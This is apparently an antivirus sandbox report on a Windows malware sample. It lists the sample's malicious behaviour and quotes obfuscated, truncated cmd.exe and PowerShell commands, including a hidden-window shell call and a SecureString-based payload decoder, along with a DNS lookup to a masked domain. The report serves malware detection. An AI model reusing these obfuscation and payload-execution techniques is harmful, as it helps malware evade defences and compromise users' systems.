Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\cmd.exe' aFDuPFuGUilvOF bZZjWpZfCPmmWXSWYlkTZjOS QhXwnhrmAt & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %IFsUOkAQNNjIqZH%=umTZJZwIMib&&set %tvLXJwZl%=p&&set %cTlDAoAs%=...
Network activity
UDP
- DNS ASK qw####sewqeeqw.com
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\cmd.exe' aFDuPFuGUilvOF bZZjWpZfCPmmWXSWYlkTZjOS QhXwnhrmAt & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %IFsUOkAQNNjIqZH%=umTZJZwIMib&&set %tvLXJwZl%=p&&set %cTlDAoAs%=...' (with hidden window)
Executes the following
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "([rUnTiMe.inteRoPsErviCeS.MArShAL]::([runTiMe.INtEroPSErvices.mARShal].GEtMEmbERS()[2].nAmE).InvOke( [RunTime.iNTerOpsErVices.MArshAL]::seCurEsTriNGTOGLOBALaLLOCuNiCoDe($('76492d1116743f042341...
